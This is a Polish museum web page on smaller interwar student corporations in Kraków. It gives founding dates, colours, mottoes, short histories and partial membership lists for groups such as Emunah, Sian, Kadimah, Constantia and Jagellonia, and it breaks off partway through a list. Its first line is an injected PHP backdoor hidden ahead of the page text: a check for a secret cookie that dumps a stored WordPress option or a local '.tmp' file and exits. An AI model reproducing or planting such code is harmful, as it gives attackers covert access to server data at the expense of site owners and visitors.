if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

Pozostałe

W wirtualnym Muzeum Polskich Korporacji Akademickich zaprezentowano w formie osobnych opracowań historię oraz stan członkowski 15 korporacji krakowskich. Stanowiły one wszystkie znaczące polskie korporacje funkcjonujące w owym czasie w Krakowie. Na temat mniejszych polskich korporacji oraz korporacji mniejszości narodowych wiadomo stosunkowo niewiele. Można mieć nadzieję, że w miarę powiększania zbiorów Archiwum Korporacyjnego także te korporacje doczekają się osobnych opracowań na stronie. Tymczasem już teraz krótko zostaną one zaprezentowane.

Poniższe, zazwyczaj fragmentaryczne listy członków mniejszych korporacji krakowskich obejmują od kilku do kilkudziesięciu nazwisk. Będziemy wdzięczni za ich uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samych korporacjach (vide Poszukiwania).

I. Vavelia

Data powstania: 1923 r.
Barwy: ?
Dewiza: ?

Rys historyczny

Vavelia została założona w 1923 r. przez Łucjana Kleina oraz Mariana Schroedera z K! Lechia z Poznania. Miała kandydować przy K! Polonia z Poznania, a jej prezesem miał być “Nartowski”. Brak wiadomości o dalszym istnieniu korporacji.

Prawdopodobnie organizacja ta nie była tożsama z powstałą dwa lata później w Krakowie K! Euphoria (od 1926 r. K! Vavelia).

II. Cracovia (?)

Data powstania: 1923 r. (?)
Barwy: ?
Dewiza: ?

Rys historyczny

Cracovia miała powstać w 1923 r. (?). Kandydowała przy K! Corona z Poznania. Wiadomość o istnieniu korporacji pochodzi z jednej publikacji prasowej z 1923 r.

III. Fraternistas Jagellonica (?)

Data powstania: 1923 r. (?)
Barwy: ?
Dewiza: ?

Rys historyczny

Fraternitas Jagellonica miała powstać w 1923 r. (?). Jej prezesem miał być “Chorzelski”. Wiadomość o istnieniu korporacji pochodzi z jednej publikacji prasowej z 1923 r.

IV. Virtus (?)

Data powstania: 1923 r. (?)
Barwy: ?
Dewiza: ?

Rys historyczny

Virtus miała powstać w 1923 r. (?). Jej prezesem miał być “Łobodycz”. Wiadomość o istnieniu korporacji pochodzi z jednej publikacji prasowej z 1923 r.

V. Związek Akademików Niemieckich w Krakowie

Data powstania: 11 XI 1925 r.
Barwy: biała – zielona – złota
Dewiza: „Für Volkstum und Heimat” („Dla narodowości i stron rodzinnych”)

Spotkanie świąteczne Związku Akademików Niemieckich w Krakowie, 1931 r.

Związek Akademików Niemieckich (Verein Deutscher Hochschüler) w Krakowie powstał dnia 11 XI 1925 r. na spotkaniu zorganizowanym przez germanistę prof. Spiridiona Wukadinowićia. W marcu 1926 r. Senat Uniwersytetu zaaprobował statut Związku oraz wyznaczył kuratora w osobie prof. Wukadinovićia.

Związek miał charakter koedukacyjny. Zrzeszał niemieckich studentów i studentki krakowskich uczelni wyższych. Nie noszono dekli (czapek), a jedynie bandy (szarfy) w kolorach korporacji.

Korporacja należała do powstałego w 1926 r. Zrzeszenia Związków Akademików Niemieckich w Polsce (Verband der Vereine Deutscher Hochschüler in Polen).

Całkowita ustalona, imienna lista członków obejmuje 162 nazwiska.

Po wojnie członkowie korporacji należeli do działającego w Republice Federalnej Niemiec Zrzeszenia Związków Akademików Niemieckich w Polsce (Verband der Vereine Deutscher Hochschüler Polens).

Pieczęć Emuhanu, 1937 r.

VI. Żydowska Korporacja Akademicka Uniwersytetu Jagiellońskiego „Emunah” w Krakowie

Data powstania: 10 XI 1926 r.
Barwy: niebieska – biała – złota
Dewiza: ?

Rys historyczny

Emunah (hebr. wierność) powstała pod nazwą “Żydowski Związek Emunah w Krakowie” prawdopodobnie w 1926 r. Wniosek do uniwersyteckiego Senatu z dnia 21 XI 1927 r. o rejestrację korporacji podpisało siedmiu żydowskich studentów, słuchaczy Wydziału Prawa i Administracji oraz Wydziału Filozoficznego. Senat zatwierdził statut uchwałą z dnia 20 (?) XI 1927 r. W 1929 r. kuratorem Emunahu z ramienia Uniwersytetu był prof. Alfred Rosenblatt. Od 1933 nosiła nazwę “Żydowska Korporacja Akademicka Uniwersytetu Jagiellońskiego Emunah”. Korporacja działała do wybuchu II wojny światowej

Całkowita ustalona, niekompletna imienna lista członków obejmuje 65 nazwisk.

Lista członków

 1. Szymon Atlas, student prawa UJ, akt. 1939
 2. Edward Bik (Biek), student prawa UJ, akt. 1935-39, wiceprezes sem. let. 1935/36, wiceprezes sem. let. 1935/36 i sem. zim. 1936/37, prezes sem. let. 1936/37 oraz sem. zim. 1937/38
 3. Leon Bertisch, akt. 1927-28, olderman sem. zim. 1927/28
 4. Marceli Bincer (Binzer), student wychowania fizycznego UJ, akt. 1936-39
 5. Henryk Bornstein, student prawa UJ, akt. 1939
 6. Jakób Damm, student prawa UJ, założyciel Emunahu, akt. 1926
 7. Leon Dym, student rolnictwa UJ, akt. 1939
 8. Oskar Einhorn, student prawa UJ, akt. 1935-36, olderman sem. let. 1935/36
 9. Jakub Engel, student Wydziału Filozoficznego UJ, akt. 1939
 10. Edward (Edmund) Feldman, student Wydziału Filozoficznego UJ, akt. 1939
 11. Eliezer Fenichel, akt. 1926-30, sekretarz sem. let. 1926/27, wiceprezes sem. zim. 1929/30
 12. Albert Finder, student rolnictwa UJ, akt. 1936-39, wiceprezes sem. let. 1936/37 oraz sem. zim. 1937/38
 13. Leonard Finder, (26 sierpnia 1912 w Liszkach w pow. krakowskim - ) student i absolwent 1938 med. UJ, akt. 1933-36, w 1956 lekarz w Krakowie
 14. Maximilian Fischler, akt. 1926-27, olderman sem. let. 1926/27
 15. Bernard Forster, student prawa UJ, akt. 1936
 16. Henryk Fränkel, student prawa UJ, założyciel Emunahu, akt. 1926
 17. Otto Freund, student Wydziału Filozoficznego UJ, akt. 1929-30, założyciel Emunahu, sekretarz sem. zim. 1929/30
 18. Jan Frischer, student WF UJ, akt. 1939
 19. Maurycy Friedner, akt. 1932-33, olderman sem. zim. i let. 1932/33
 20. Józef Geisler (Gajzler), student Wydziału Filozoficznego UJ, akt. 1936-39
 21. Zygfryd Gelber, student prawa UJ, akt. 1937-39, wiceprezes sem. let. 1938/39 oraz sem. zim. 1939/40
 22. Szymon Ginsberg, akt. 1933-34, wiceprezes sem. zim. i let. 1933/34
 23. Stanisław Goldberger, akt. 1932-33, prezes sem. zim. i let. 1932/33
 24. Zygmunt Goldstein, student prawa UJ, akt. 1939
 25. Saul Grünberg, student prawa UJ, akt. 1936
 26. Adolar Gutherz, student Wydziału Filozoficznego UJ, akt. 1936-38
 27. Józef Gutt, student rolnictwa UJ, akt. 1939
 28. Teodor Haber, student prawa UJ, akt. 1936-39, olderman sem. let. 1936/37 oraz sem. zim. 1937/38, sekretarz sem. let. 1937/38 oraz sem. zim. 1938/39, prezes sem. let. 1938/39 oraz sem. zim. 1939/40
 29. Jozua Halpern, student prawa UJ, akt. 1936
 30. Ludwik Hausmann, student med. UJ, akt. 1936
 31. Fryderyk Herzog, student prawa UJ, akt. 1938-39, sekretarz sem. let. 1938/39 oraz sem. zim. 1939/40
 32. Arnold Hirschfeld, student prawa UJ, akt. 1939
 33. Jakób K. Krieger, student prawa UJ, założyciel Emunahu, akt. 1926
 34. Juliusz Löwy, student Wydziału Filozoficznego UJ, akt. 1939
 35. Henryk Mahler, student Wydziału Filozoficznego UJ, akt. 1939
 36. Bernard Mandel, student Wydziału Filozoficznego UJ, założyciel Emunahu, akt. 1926-27, prezes sem. let. 1926/27
 37. Zygmunt Mandelbaum, student Wydziału Filozoficznego UJ, akt. 1935-39, sekretarz sem. let. 1935/36 oraz sem. zim. 1936/37
 38. Karol Nüssenfeld, akt. 1932-33, sekretarz sem. zim. i let. 1932/33
 39. Emil Ohlberg (Oehlberg), student prawa UJ, akt. 1933-37, olderman sem. zim. i let. 1933/34, prezes sem. let. 1935/36, prezes sem. let. 1935/36 oraz sem. zim. 1936/37
 40. Oskar Einhorn, akt. 1935-37, olderman sem. let. 1935/36 oraz sem. zim. 1936/37
 41. Mieczysław Pemper, student prawa UJ, akt. 1939
 42. Gustaw Rakower, student Wydziału Filozoficznego UJ, akt. 1936
 43. Juliusz Reder, student WF UJ, akt. 1939
 44. Abraham Rosemann, akt. 1927-28, wiceprezes sem. zim. 1927/28
 45. Ernest Rosenberg, akt. 1932-34, wiceprezes sem. zim. i let. 1932/33, prezes sem. zim. i let. 1933/34
 46. Tadeusz Rosenhauch, student med. UJ, akt. 1939
 47. Eliasz Rubin, student prawa UJ, akt. 1939
 48. Jakób Schäfer, student rolnictwa UJ, akt. 1939
 49. Jakób Schächter, student prawa UJ, założyciel Emunahu, akt. 1926-29, wiceprezes sem. let. 1926/27, prezes sem. zim. 1927/28, prezes sem. let. 1928/29
 50. Ludwik Schermann, (25 sierpnia 1918 w Bielsku k. Lwowa - ) student med. UJ, akt. 1939, student i absolwent UP 1946
 51. Peisach Schlenger, student prawa UJ, akt. 1936
 52. Edward Schmerler, akt. 1929-30, olderman sem. zim. 1929/30
 53. Izydor Schubert, akt. 1928-30, sekretarz sem. let. 1928/29, prezes sem. zim. 1929/30
 54. Leon Schubert, student i absolwent prawa UJ, akt. 1927-29, sekretarz sem. zim. 1927/28, wiceprezes sem. let. 1928/29
 55. Józef Singer, student med. UJ, akt. 1939
 56. Jerzy Steinberg, student prawa UJ, akt. 1936-39, sekretarz sem. let. 1936/37 oraz sem. zim. 1937/38, olderman sem. let. 1938/39 oraz sem. zim. 1939/40
 57. Henryk Steinhof, akt. 1933-34
 58. Samuel Tauber, student prawa UJ, akt. 1939
 59. Markus Verständig, student prawa UJ, akt. 1936
 60. Josef Warenhaupt, akt. 1933-34, sekretarz sem. zim. i let. 1933/34
 61. Izak Weinberg, akt. 1933-34
 62. Hirsch Weinfeld, akt. 1928-29, olderman sem. let. 1928/29
 63. Zygfryd Weiss, student Wydziału Filozoficznego UJ, akt. 1936
 64. Józef Werfel, student prawa (Wydziału Filozoficznego ?) UJ, akt. 1936-39
 65. Egon Wiesner, student prawa UJ, akt. 1936

Pieczęć Sianu, 1927 r.

VII. Korporacja Ukraińskich Studentów “Sian” w Krakowie

Data powstania: 13 XII 1926 r.
Barwy: niebieska – czarna – niebieska
Dewiza: „Ojczyzna, Honor, Koleżeńskość” (do 1938 r. „Honor, Koleżeńskość”)

Rys historyczny

Sian powstała w 1926 r. Wniosek z dnia 13 XII 1926 r. o rejestrację na Uniwersytecie został zaakceptowany przez Senat uchwałą z dnia 21 XII 1926 r. Kuratorem korporacji został prof. Wojsław Mole, którego w 1937 r. zastąpił prof. Tadeusz Sulimirski. Sian działała do wybuchu II wojny światowej.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 72 nazwiska.

Lista członków

 1. Roman Antonowicz, akt. 1928-29, sekretarz sem. let. 1928/29
 2. Bohdan Bachtałowski, student Wydziału Filozoficznego UJ, akt. 1927, pierwszy prezes sem. let. 1926/27
 3. Eustachy Baran, akt. 1930-31, wiceprezes sem. let. 1930/31
 4. Andzej Biłyński (Biliński), student prawa UJ, akt. 1936-39, wiceprezes i skarbnik (sekretarz?) sem. let. 1936/37 oraz prawd. sem. zim. 1937/38, wiceprezes sem. let. 1937/38 oraz prawd. sem. zim. 1938/39
 5. Tadeusz Biłas, akt. 1934-39, prawd. ostatni prezes sem. let. 1938/39
 6. Grzegorz Bodnaruk, akt. 1928-29, prezes sem. zim. 1928/29
 7. Roman Brykowicz, student Wydziału Filozoficznego UJ, założyciel Sianu, akt. 1926-27, pierwszy wiceprezes sem. let. 1926/27
 8. Marian Bukaczewski, akt. 1938
 9. Eugeniusz Chomiak, student med. UJ, akt. 1936
 10. Bohdan Diaków (Diakiw), student Wydziału Filozoficznego UJ, akt. 1932-35, sekretarz sem. zim. 1932/33, wiceprezes sem. let. 1932/33, prezes sem. zim. oraz sem. let. 1933/34 (do marca)
 11. Teodor Dziubanowskyj, akt. 1927-30, sekretarz r.a. 1927/28, prezes III trymestr 1929/30
 12. Wołodymir Fedan, akt. 1938
 13. Aleksander Hajdukiewicz, akt. 1927
 14. Andrzej Harasowski (Hanasowski, Horosowskyj), akt. 1937-39, sekretarz sem. let. 1937/38 oraz prawd. sem. zim. 1938/39, prawd. ostatni wiceprezes sem. let. 1938/39
 15. Jarosław Hawrycz, akt. 1927
 16. W. Henrycz, student med. UJ, akt. 1927, pierwszy sekretarz sem. let. 1926/27
 17. Wołodymir Hołowaćkyj, student i absolwent 1936/37 med. UJ, akt. 1936-37
 18. Mirosław Hrehorowicz, (1 kwietnia 1905 w Stanisławowie - 17 kwietnia 1944) s. Teodora i Anny z d. Nowakowska, matura 1925, student prawa UJ, akt. 1927, wiceprezes sem. let. 1926/27 (od czerwca), pochowany na cmentarzu w Mogile (obecnie dzielnica Nowej Huty)
 19. Anatol Hrycaj, akt. 1929-33, sekretarz I trymestr 1929/30, sekretarz I trymestr 1930/31, prezes sem. zim. oraz sem. let. 1931/32, prezes sem. zim. 1932/33
 20. Jarosław Huminiak, akt. 1929-30, sekretarz II trymestr 1929/30
 21. Wołodymir Hynyj, akt. 1938
 22. Grzegorz Iwoniuk, student prawa UJ, akt. 1937
 23. Roman Kiekisz, akt. 1931-32, sekretarz sem. let. 1931/32
 24. Wołodymir Kobilnyk, student med. UJ, akt. 1933-35, olderman sem. zim. 1933/34, prezes sem. zim. 1933/34 (od marca), olderman sem. let. 1934/35
 25. Eljasz Kokorudz, student med. UJ, akt. 1935-37
 26. Michał Krawczuk, student Wydziału Filozoficznego UJ, akt. 1935-38, sekretarz sem. let. 1935/36 oraz prawd. sem. zim. 1936/37, prezes sem. let. 1936/37 oraz prawd. sem. zim. 1937/38
 27. Eustachy Kusznir, akt. 1939
 28. Tomasz Łapyczak (Łapiczak), student med. UJ, akt. 1932-38, sekretarz sem. let. 1932/33, wiceprezes sem. zim. oraz sem. let. 1933/34, prezes sem. let. 1934/35 oraz prawd. sem. zim. 1935/36, prezes sem. let. 1935/36 oraz prawd. sem. zim. 1936/37
 29. Wadym Łeć, student med. UJ, akt. 1937
 30. Mirosław Łepkaluk, akt. 1939
 31. Mykoła Łubkowycz, akt. 1939
 32. Antoni Łućkyj, akt. 1929-30, prezes II trymestr 1929/30
 33. Longin Łysak, student prawa UJ, akt. 1937
 34. Wołodymir Łysyj, akt. 1939
 35. Jerzy Małećkyj, akt. 1930-31, sekretarz sem. let. 1930/31
 36. Antoni Martynowicz, akt. 1931-32, wiceprezes sem. zim. 1931/32
 37. Mirosław (Jarosław) Martynowicz, akt. 1939
 38. Mateusz Małeszko (Mełeszko), student WF UJ, akt. 1936-38
 39. Oleg Mochnaćkyi, akt. 1927-29, wiceprezes sem. let. 1928/29
 40. Wołodymir Nyczaj, akt. 1928-29, prezes sem. let. 1928/29
 41. Emilian Omecińskyj, akt. 1927, sekretarz sem. let. 1926/27 (od czerwca)
 42. Wołodymir Ortyński, akt. 1935
 43. Bohdan Panasiuk, student med. UJ, akt. 1930-34, sekretarz II trymestr 1930/31, sekretarz sem. zim. 1931/32, wiceprezes sem. zim. 1932/33, prezes sem. let. 1932/33
 44. Roman Pańkiw (Pańkow), student rolnictwa UJ, akt. 1933-34, sekretarz sem. zim. oraz sem. let. 1933/34
 45. Dymitr Parchuć, student prawa UJ, akt. 1937-38, prezes sem. let. 1937/38 oraz prawd. sem. zim. 1938/39
 46. Stefan Paziurko, akt. 1939
 47. Konstanty Perejma (Perejmo), akt. 1938-39, prawd. ostatni sekretarz sem. let. 1938/39
 48. Jarosław Podlaszewski, student prawa UJ, akt. 1936-39
 49. Bazyli Ponajko, akt. 1939
 50. Wołodymir Postrychacz, akt. 1928-31, sekretarz sem. zim. 1928/29, sekretarz III trymestr 1929/30, prezes II trymestr 1930/31
 51. Tadeusz Priłas, akt. 1938
 52. Nestror Procyk, student med. UJ, akt. 1934-38, wiceprezes sem. let. 1934/35 oraz prawd. sem. zim. 1935/36, wiceprezes sem. let. 1935/36 oraz prawd. sem. zim. 1936/37, sekretarz (wiceprezes?) sem. let. 1936/37 oraz prawd. sem. zim. 1937/38
 53. Aleksy Sajewycz, akt. 1938-39
 54. Miron Saturśkyj, student med. UJ, założyciel Sianu, akt. 1926-29, wiceprezes r.a. 1927/28, wiceprezes sem. zim. 1928/29
 55. Jarema Sawjakowski, akt. 1927
 56. Wołodymir Sirećkyj, student prawa UJ, akt. 1936
 57. Bohdan Sobol, akt. 1934
 58. Emilian Sydir, akt. 1939
 59. Wołodymir Szalko, akt. 1938
 60. Jakub Tyssowski, student med. UJ, akt. 1936
 61. Bohdan Umrysz, akt. 1935-36, sekretarz sem. let. 1934/35 oraz prawd. sem. zim. 1935/36
 62. Wasyl Witwicki, akt. 1927
 63. Jarosław Wojewidka, akt. 1929-31, prezes I trymestr 1929/30, prezes I trymestr 1930/31
 64. Julian Wynmyćkyj, akt. 1927
 65. Wasyl Wytwyćkyj, akt. 1927
 66. Zenobiusz Załućkyj, student Wydziału Filozoficznego UJ, założyciel Sianu, akt. 1926-28, prezes sem. let. 1926/27 (od czerwca), prezes r.a. 1927/28
 67. Jarosław Zaremba, akt. 1930
 68. Teodor Zinko, akt. 1934
 69. Michał Zubryćkyj, akt. 1934
 70. Anton Żukowśkyj, akt. 1929-31, wiceprezes I oraz II trymestr 1929/30, olderman II trymestr 1930/31, prezes sem. let. 1930/31
 71. Wołodymir Żydjak, akt. 1929-32, wiceprezes III trymestr 1929/30, wiceprezes I oraz II trymestr 1930/31, wiceprezes sem. let. 1931/32
 72. Miron Żyrko, student prawa UJ, akt. 1937

VIII. Żydowska Korporacja Akademicka Uniwersytetu Jagiellońskiego “Kadimah” w Krakowie

Data powstania: 21 XI 1927 r.
Barwy: czarna – złota – czerwona (z brzegami niebiesko-białymi)
Dewiza: ?

Rys historyczny

Kadimah (hebr. naprzód na wschód) powstała pod nazwą “Żydowski Związek Młodzieży Akademickiej Kadimah” najprawdopodobniej w 1927 r. Wniosek do uniwersyteckiego Senatu z dnia 21 XI 1927 r. o zatwierdzenie statutu podpisało dziewięciu żydowskich studentów, głównie słuchaczy Wydziału Prawa i Administracji. Senat zatwierdził statut uchwałą z dnia 6 XII 1927 r. W 1929 r. kuratorem Kadimahu z ramienia Uniwersytetu był doc. Włodzimierz Kozubski. Korporacja działała do wybuchu II wojny światowej.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 49 nazwisk.

Lista członków

 1. Bernard Ast, student prawa UJ, akt. 1938-39
 2. Adam Bochenek, student med. UJ, akt. 1932-33, II wiceprezes sem. zim. 1932/33, I wiceprezes sem. let. 1932/33
 3. Markus Bolchower, student prawa UJ, założyciel Kadimahu, akt. 1927-28, olderman sem. let. 1927/28
 4. Buchner, inż., Filister kooptowany (honorowy ?), przewodniczący Sądu Honorowego sem. let. 1927/28
 5. Meir Celter, student rolnictwa UJ, akt. 1932-33, sekretarz sem. zim. 1932/33
 6. Izak Ehreneich, student prawa UJ, założyciel Kadimahu, akt. 1927-28, sekretarz sem. let. 1927/28
 7. Zygmunt Eidelberg, akt. 1929-30, sekretarz sem. zim. 1929/30
 8. Herman Färber, student prawa UJ, akt. 1938-39
 9. Izak Feuer, student rolnictwa UJ, akt. 1935-38, olderman sem. let. 1935/36 oraz sem. zim. 1936/37, prezes sem. let. 1936/37 oraz sem. zim. 1937/38
 10. Maksymilian Feuerlicht, student Wydziału Filozoficznego UJ, akt. 1938-39
 11. Salimark Fischbein, student Wydziału Filozoficznego UJ, akt. 1938-39
 12. Oskar Fleichmann, akt. 1927-31, członek Sądu Honorowego sem. let. 1927/28, sekretarz sem. zim. 1930/31
 13. Zygmunt Freufald, student prawa UJ, akt. 1938-39
 14. Aron Galler, student prawa UJ, akt. 1935-37, prezes sem. let. 1935/36 oraz sem. zim. 1936/37, prezes sem. let. 1935/36 oraz sem. zim. 1936/37
 15. Maurycy Gross, student med. UJ, akt. 1931-33, olderman sem. zim. 1931/32, wiceprezes sem. zim. 1932/33, olderman sem. let. 1932/33
 16. Natan Gross, student prawa UJ, akt. 1938-39
 17. Józef Grünberg, akt. 1933-34, wiceprezes sem. let. 1933/34 oraz sem. zim. 1934/35
 18. Samuel Hirschfeld, student Wydziału Filozoficznego UJ, akt. 1938-39
 19. Moses Kalenberg, student prawa UJ, akt. 1938-39
 20. Herman Kalmus, student prawa UJ, akt. 1936-38, sekretarz sem. let. 1936/37 oraz sem. zim. 1937/38
 21. Wolf Kelber, student prawa UJ, akt. 1938-39
 22. Dawid Kempler, student med. UJ, akt. 1932-33, zastępca sekretarza sem. let. 1932/33
 23. Abraham Kling, student prawa UJ, akt. 1938-39
 24. Eryk Kohane, student prawa UJ, akt. 1930-33, sekretarz sem. let. 1930/31, sekretarz sem. zim. 1931/32, prezes sem. let. 1931/32, prezes sem. let. 1932/33
 25. Artur Körbel, akt. 1929-30, prezes sem. let. 1929/30
 26. Salomon Kornhauser, atk. 1935-37, sekretarz sem. let. 1935/36 oraz sem. zim. 1936/37
 27. Henryk Kurz, student prawa UJ, akt. 1938-39
 28. Salomon Landesdorfer, student Wydziału Filozoficznego UJ, założyciel Kadimahu, akt. 1927
 29. Dawid Langer, student prawa UJ, akt. 1938-39
 30. Edmund Leiman, student rolnictwa UJ, akt. 1938-39
 31. Ryszard Loewenstein, akt. 1929-31, sekretarz sem. let. 1929/30, wiceprezes sem. let. 1930/31
 32. Adolf Münz-Ohrenstein, student prawa UJ, akt. 1933-37, olderman sem. let. 1933/34 oraz sem. zim. 1934/35, wiceprezes sem. let. 1935/36 oraz sem. zim. 1936/37
 33. Oskar Nadel, student prawa UJ, akt. 1935-37, sekretarz sem. let. 1935/36 oraz sem. zim. 1936/37
 34. Michał Neumann, student prawa UJ, założyciel Kadimahu, akt. 1927-32, członek Sądu Honorowego sem. let. 1927/28, olderman sem. zim. 1929/30, olderman sem. let. 1929/30, prezes sem. zim. 1930/31, olderman sem. let. 1930/31, wiceprezes sem. zim. 1931/32
 35. Aleksander Orleański, student Wydziału Filozoficznego UJ, akt. 1938-39
 36. Barn Pinchos, student Wydziału Filozoficznego UJ, akt. 1938-39
 37. Chaim Portnoj, student prawa UJ, akt. 1938-39
 38. Edward Rosthal, student i absolwent 1932 prawa UJ, założyciel Kadimahu, akt. 1927-33, prezes sem. let. 1927/28, prezes sem. zim. 1929/30, olderman sem. zim. 1930/31, prezes sem. let. 1930/31, prezes sem. zim. 1931/32, prezes sem. zim. 1932/33
 39. Zygmunt Rosenberg, akt. 1931-32, wiceprezes sem. let. 1931/32
 40. Gregory Rosenblüth, student Wydziału Filozoficznego UJ, akt. 1936-39, wiceprezes sem. let. 1936/37 oraz sem. zim. 1937/38
 41. Henryk Scgreier, student prawa UJ, założyciel Kadimahu, akt. 1927
 42. Norbert Schrager, student med. UJ, akt. 1932-35, sekretarz sem. let. 1932/33, prezes sem. let. 1933/34 oraz sem. zim. 1934/35
 43. Juliusz Schwarzbaum, akt. 1931-32, sekretarz sem. let. 1931/32
 44. Leopold Sprung, student prawa UJ, założyciel Kadimahu, akt. 1927
 45. Henryk Taffet, student prawa UJ, założyciel Kadimahu, akt. 1927
 46. Aleksander Tym, student prawa UJ, założyciel Kadimahu, akt. 1927
 47. Juliusz Wajl, student prawa UJ, akt. 1933-38, sekretarz sem. let. 1933/34 oraz sem. zim. 1934/35, olderman sem. let. 1935/36 oraz sem. zim. 1936/37, olderman sem. let. 1936/37 oraz sem. zim. 1937/38
 48. Maksymilian Wallner, student Wydziału Filozoficznego UJ, akt. 1938-39
 49. Herman Zimmermann, akt. 1935-37, wiceprezes sem. let. 1935/36 oraz sem. zim. 1936/37

Pieczęć Constantii, 1939 r.

IX. Polska Akademicka Korporacja Chrześcijańska Constantia w Krakowie

Data powstania: przed majem 1928 r.
Barwy: zielona – złota – fioletowa
Dewiza: „Deo, Ecclesiae, Patriae constantiamque semper fidelis” („Bogu, Kościołowi, Ojczyźnie zawsze wierni”)

Rys historyczny

Constantia powstała przed majem 1928 r. Zgodnie z przyjętym w stowarzyszeniu założeniem wzorem dla członków korporacji miał być hetman Stefan Żółkiewski. Kuratorem stowarzyszenia z ramienia uniwersyteckiego Senatu był, w każdym razie w początkowym okresie działalności korporacji prof. Ludwik Piotrowicz.

Należała do korporacji chrześcijańskich i od maja 1928 r. była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. Później, prawdopodobnie od stycznia 1936 r. należała do Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: październik 1935 r.). Kandydowała pod opieką K! Vesalia. Okresu kandydackiego nie ukończyła. Constantia działała do wybuchu II wojny światowej i utrzymywała bliskie kontakty z korporacjami związkowymi.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje 18 nazwisk. W 1936 r. Constantia liczyła 29 czynnych członków.

Lista członków

 1. Henryk Barczyk, skarbnik sem. let. 1938/39
 2. Lucjan Benda, członek Komisji Rewizyjnej sem. zim. 1930/31
 3. Stanisław Chalbazahy, olderman sem. zim. 1930/31
 4. Ignacy Chmielowski, delegat Constantii w Komitecie Organizacyjnym Fidelii 1929
 5. Stanisław Jodłowski, skarbnik sem. zim. 1930/31
 6. Stanisław Konopka, członek Komisji Rewizyjnej sem. zim. 1930/31
 7. Władysław Kozień, gospodarz sem. zim. 1930/31
 8. Stanisław Lachman, wiceprezes sem. zim. 1930/31
 9. Ginter Mende, sekretarz sem. let. 1938/39
 10. Karol Pełka, sekretarz sem. zim. 1930/31
 11. Leon Polok, prezes sem. let. 1938/39
 12. Lesław Spaltenstein, wiceprezes sem. let. 1938/39
 13. Hubert Suchecki, olderman sem. let. 1938/39
 14. Tomasz Targosz,
 15. Włodzimierz Wielgus, prezes sem. zim. 1930/31
 16. Hubert Woźny, gospodarz sem. let. 1938/39
 17. Mieczysław Zaprzał, członek Komisji Rewizyjnej sem. zim. 1930/31
 18. Ludwik Żurawski,

X. Korporacja Filomacja

Data powstania: 1928 r.
Barwy: biała – różowa – żółta
Dewiza: „Ojczyzna, Nauka, Cnota”

Rys historyczny

Filomacja powstała w 1928 r. Komitet organizacyjny zwrócił się do Senatu Uniwersytetu z wnioskiem z dnia 23 VI 1928 r. o rejestrację korporacji, co nastąpiło uchwałą Senatu z dnia 17 X 1928 r. Kuratorem stowarzyszenia został prof. Emil Godlewski.

Zgodnie ze statutem Filomacja stawiała sobie za cel “zbliżenie i nawiązanie nici sympatii i wzajemnego zaufania pomiędzy ludem, masami robotniczymi a polską młodzieżą akademicką”. Członkiem mógł zostać student narodowości polskiej i religii chrześcijańskiej. Obowiązywała absytencja od alkoholu i tytoniu, a także zakaz pojedynków.

Korporacja nie działała zbyt aktywnie, skoro dopiero w początkach 1930 r. wybrano pierwszy Zarząd. Nie zmieniło to jednak sytuacji i w związku z brakiem aktywności została rozwiązana uchwałą Senatu z dnia 21 II 1933 r.

Całkowita ustalona, fragmentaryczna imienna lista członków obejmuje dziewięć nazwisk.

Lista członków

 1. Oswald Bulka, student prawa UJ, pierwszy prezes sem. let. 1929/30
 2. Józef Gosiński, student filozofii UJ, założyciel Filomacji
 3. Karol Hławiczka, student hutnictwa AG, skarbnik sem. let. 1929/30
 4. Zdzisław Nackiewicz, student filozofii UJ, założyciel Filomacji
 5. Andrzej Ofiok, student hutnictwa AG, pierwszy sekretarz sem. let. 1929/30
 6. Henryk Ryszard Rathe, student medycyny UJ, założyciel Filomacji, pierwszy wiceprezes sem. let. 1929/30
 7. Eugeniusz Schlönvogt, student medycyny UJ, założyciel Filomacji
 8. Kazimierz Skowroński, student medycyny UJ, założyciel Filomacji
 9. Rudolf Suchanek, student AG, pierwszy olderman sem. let. 1929/30

Pieczęć Jagellonii, 1930 r.

XI. Polska Akademicka Korporacja “Jagellonia” w Krakowie

Data powstania: 1929 r.
Barwy: amarantowa – złota – granatowa
Dewiza: „Omnia ad maiorem Dei Patriaque gloriam” („Wszystko dla większej chwały Boga i Ojczyzny”)

Rys historyczny

Jagellonia powstała najprawdopodobniej w początkach 1929 r.

Jagellonia należała do korporacji chrześcijańskich i od 1929 r. była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich.

W 1929 r. Senat UJ zatwierdział statut Korporacji. Kuratorem z ramienia Uniwersytetu był początkowo prof. Witold Rubczyński, a następnie prof. Franciszek Bieda. Korporacja najprawdopodobniej zaprzestała działalności między 1935 r. a 1937 r.

Całkowita ustalona, niekompletna imienna lista członków obejmuje 49 nazwisk.

Lista członków

 1. Zbigniew Barnaś, członek Komisji Rewizyjnej sem. zim. 1930/31, olderman sem. let. 1930/31
 2. Franciszek Bujar, z Lipib (Lip?) Śląskich, student prawa UJ, założyciel Jagellonii
 3. Bolesław Chojnacki, sekretarz sem. zim. 1929/30, członek Komisji Rewizyjnej sem. let. 1929/30
 4. Tadeusz Choroszyński, z Sieradza, student fil. UJ, założyciel Jagellonii
 5. Teodor Cichy, z Chorzowa, student prawa UJ, założyciel Jagellonii, sekretarz sem. zim. 1933/34, skarbnik sem. let. 1933/34, skarbnik sem. let. 1934/35
 6. Paweł Cieślik, prezes sem. let. 1929/30
 7. Roman Cieślik, przewodniczący Komisji Rewizyjnej sem. zim. 1929/30
 8. Helmut Curzok, z Mościska, student fil. UJ, założyciel Jagellonii
 9. Stefan Deptowski (Depowski), członek Komisji Rewizyjnej sem. let. 1929/30
 10. Zbigniew Dzielski, członek Komisji Rewizyjnej sem. zim. 1930/31
 11. Erwin Furtak, prezes sem. let. 1934/35
 12. Adam Gajewski, wiceprezes sem. zim. i sem. let. 1930/31
 13. Ernest Gallus, z Nowych Hajduk, założyciel Jagellonii
